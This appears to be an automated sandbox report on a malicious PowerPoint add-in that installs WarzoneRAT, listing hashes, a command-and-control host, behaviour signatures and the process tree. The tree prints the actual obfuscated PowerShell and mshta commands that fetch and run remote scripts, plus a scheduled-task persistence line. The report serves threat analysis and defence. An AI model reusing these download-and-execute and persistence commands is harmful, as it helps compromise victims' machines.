Analysis
-
max time kernel
146s -
max time network
161s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
12-07-2021 15:03
Static task
static1
Behavioral task
behavioral1
Sample
IdDetails.ppam
Resource
win7v20210408
Behavioral task
behavioral2
Sample
IdDetails.ppam
Resource
win10v20210410
General
-
Target
IdDetails.ppam
-
Size
16KB
-
MD5
8fb67950eee24c33116c5c8ae87bbde1
-
SHA1
26d8b5eec451ed68f3a61f4f69b4fadffb736d22
-
SHA256
a524b17edc79f1cacd57f9a07becfd24df6d0ef893d11620cb3c300c86c327ed
-
SHA512
1c03f7930d08ad4ea8d7fc0f8527d5db6bc618989e8ab9183abe05309d6b9f75f0eef61271059a576e2709a7d6ec5385f206d48ca99eeda9832148fa1117c9e3
Malware Config
Extracted
https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt
Extracted
warzonerat
normanaman.duckdns.org:3009
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exeschtasks.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 4268 4444 mshta.exe POWERPNT.EXE Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3748 3504 schtasks.exe -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Blocklisted process makes network request 20 IoCs
Processes:
mshta.exepowershell.exepowershell.exeflow pid process 17 4268 mshta.exe 19 4268 mshta.exe 21 4268 mshta.exe 23 4268 mshta.exe 25 4268 mshta.exe 29 4268 mshta.exe 30 4268 mshta.exe 32 4268 mshta.exe 33 4268 mshta.exe 35 4268 mshta.exe 38 1672 powershell.exe 40 1812 powershell.exe 42 1672 powershell.exe 46 1672 powershell.exe 48 1672 powershell.exe 50 1672 powershell.exe 51 1672 powershell.exe 53 1672 powershell.exe 54 1812 powershell.exe 58 1812 powershell.exe -
Process spawned suspicious child process 1 IoCs
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
Processes:
DW20.EXEdescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 4304 4444 DW20.EXE POWERPNT.EXE -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 1812 set thread context of 4832 1812 powershell.exe MSBuild.exe PID 1812 set thread context of 4964 1812 powershell.exe MSBuild.exe PID 1812 set thread context of 4128 1812 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2932 4268 WerFault.exe mshta.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1900 schtasks.exe 3748 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 4444 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
POWERPNT.EXEpowershell.exepowershell.exeWerFault.exepid process 4444 POWERPNT.EXE 4444 POWERPNT.EXE 1672 powershell.exe 1812 powershell.exe 1672 powershell.exe 1672 powershell.exe 1812 powershell.exe 2932 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 1812 powershell.exe 1812 powershell.exe 1812 powershell.exe 1812 powershell.exe 1812 powershell.exe 1812 powershell.exe 1812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 1812 powershell.exe Token: SeDebugPrivilege 2932 WerFault.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
POWERPNT.EXEpid process 4444 POWERPNT.EXE -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.exepowershell.exedescription pid process target process PID 4444 wrote to memory of 4268 4444 POWERPNT.EXE mshta.exe PID 4444 wrote to memory of 4268 4444 POWERPNT.EXE mshta.exe PID 4268 wrote to memory of 1672 4268 mshta.exe powershell.exe PID 4268 wrote to memory of 1672 4268 mshta.exe powershell.exe PID 4268 wrote to memory of 1900 4268 mshta.exe schtasks.exe PID 4268 wrote to memory of 1900 4268 mshta.exe schtasks.exe PID 4268 wrote to memory of 1812 4268 mshta.exe powershell.exe PID 4268 wrote to memory of 1812 4268 mshta.exe powershell.exe PID 1812 wrote to memory of 4832 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4832 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4832 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4832 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4832 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4832 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4832 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4832 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4832 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4832 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4964 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4964 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4964 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4964 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4964 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4964 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4964 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4964 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4964 1812 powershell.exe MSBuild.exe PID 1812 wrote to memory of 4964 1812 powershell.exe MSBuild.exe PID 1672 wrote to memory of 5056 1672 powershell.exe WScript.exe PID 1672 wrote to memory of 5056 1672 powershell.exe WScript.exe PID 1812 wrote to memory of 3124 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 3124 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 3124 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 3248 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 3248 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 3248 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 2276 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 2276 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 2276 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 4128 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 4128 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 4128 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 4128 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 4128 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 4128 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 4128 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 4128 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 4128 1812 powershell.exe aspnet_compiler.exe PID 1812 wrote to memory of 4128 1812 powershell.exe aspnet_compiler.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\IdDetails.ppam" /ou ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\mshta.exemshta http://www.bitly.com/ashjdkqowdhqowdh2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $www='https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC'.Replace('AAAAAAAAAAA','t Syste').Replace('BBBBBBBBBBBBBB','et.We');$bbb='lieCCCCCCCCCCnloaOOOOOOOOOOOOOOOring($www);'.Replace('CCCCCCCCCC','nt).Dow').Replace('OOOOOOOOOOOOOOO','dst');$hbar=I`E`X ($sss,$aaa,$bbb-Join '')|I`E`X;3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\lub.vbs"4⤵
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""BlueStacks"" /F /tr ""\""MsHtA""\""http://1230948%1230948@backishbackuponback.blogspot.com/p/clientsced.html\""3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/1.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/2.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601403.us.archive.org/11/items/3_20210710_20210710/3.txt').GetResponse().GetResponseStream()).ReadToend());3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe#cmd4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"{path}"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4268 -s 28883⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 28282⤵
- Process spawned suspicious child process
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\13e3e51f9f4d4cafa6966ff7132d4244 /t 3836 /p 44441⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /sc MINUTE /mo 80 /tn ""BatFile"" /F /tr ""\""C:\Users\Public\clone.vbs""1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
ba0c69ceb0908b193521106967959098
SHA144ca77c41d4ab2c17df1c831c41900e4f692f8de
SHA25671f2c3e06e74aa830de694c5a96927e37919c322b8e2ace896a87cbf44b32f55
SHA512cf70230fe5dc40ff2b4d03dd9dedd7444f70430e35da55627ec8963244f47dce150e371b5015e508fed11b02a8e84cad240cd6d251dac2df3037ce149d03ca97
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
a98c93b23d6a2122c96c2a3bd8606e88
SHA17409c65007405982279319fb1877da06a9c40c5a
SHA256758c1de4173cee4e6e2b96f9a5f5a4d78cd6ff57e5cdf913878cf4c76d12c42f
SHA512b1d964d50afdc472c9fb0a123477452b7d9b2450d38af7608264848146fa205ca3a6aace7411c7c189df6c37106c05fae8b4060c4842a848e6456acba59af865
-
C:\Users\Public\lub.vbsMD5
1edd4ddfe49d879dd3c977804a05b9bd
SHA117157ecc88f381e568f36b9263044450e9dfccbe
SHA256d8a10361792b7d54e4084a5a9736e3c8e47e805be894b9a7965e48793f591efa
SHA5126a75daef70bb16da4f33f33fe8e7263b35e327205c2c0f0cc1e44445c8103021ff200830698013f9ad8b3179127ae45a9260b8d10a2bc147417dc378d3a6d0df
-
memory/1672-198-0x0000000000000000-mapping.dmp
-
memory/1672-229-0x000001C54B7E6000-0x000001C54B7E8000-memory.dmpFilesize
8KB
-
memory/1672-219-0x000001C54B7E3000-0x000001C54B7E5000-memory.dmpFilesize
8KB
-
memory/1672-216-0x000001C54B7E0000-0x000001C54B7E2000-memory.dmpFilesize
8KB
-
memory/1672-213-0x000001C54B970000-0x000001C54B971000-memory.dmpFilesize
4KB
-
memory/1672-209-0x000001C54B790000-0x000001C54B791000-memory.dmpFilesize
4KB
-
memory/1812-241-0x000001BFCDB20000-0x000001BFCDB23000-memory.dmpFilesize
12KB
-
memory/1812-235-0x000001BFCDB00000-0x000001BFCDB0B000-memory.dmpFilesize
44KB
-
memory/1812-269-0x000001BFCDB30000-0x000001BFCDB31000-memory.dmpFilesize
4KB
-
memory/1812-251-0x000001BFCDCF0000-0x000001BFCDD10000-memory.dmpFilesize
128KB
-
memory/1812-200-0x0000000000000000-mapping.dmp
-
memory/1812-230-0x000001BFCD986000-0x000001BFCD988000-memory.dmpFilesize
8KB
-
memory/1812-220-0x000001BFCD980000-0x000001BFCD982000-memory.dmpFilesize
8KB
-
memory/1812-221-0x000001BFCD983000-0x000001BFCD985000-memory.dmpFilesize
8KB
-
memory/1900-199-0x0000000000000000-mapping.dmp
-
memory/4128-263-0x0000000000405E28-mapping.dmp
-
memory/4268-190-0x0000000000000000-mapping.dmp
-
memory/4444-119-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmpFilesize
64KB
-
memory/4444-122-0x0000021DA7560000-0x0000021DA864E000-memory.dmpFilesize
16.9MB
-
memory/4444-123-0x00007FF9D0890000-0x00007FF9D2785000-memory.dmpFilesize
31.0MB
-
memory/4444-118-0x00007FF9D65E0000-0x00007FF9D81BD000-memory.dmpFilesize
27.9MB
-
memory/4444-115-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmpFilesize
64KB
-
memory/4444-114-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmpFilesize
64KB
-
memory/4444-116-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmpFilesize
64KB
-
memory/4444-117-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmpFilesize
64KB
-
memory/4832-236-0x0000000000400000-0x000000000055E000-memory.dmpFilesize
1.4MB
-
memory/4832-240-0x0000000000400000-0x000000000055E000-memory.dmpFilesize
1.4MB
-
memory/4832-237-0x0000000000405E28-mapping.dmp
-
memory/4964-243-0x0000000000405E28-mapping.dmp
-
memory/5056-248-0x0000000000000000-mapping.dmp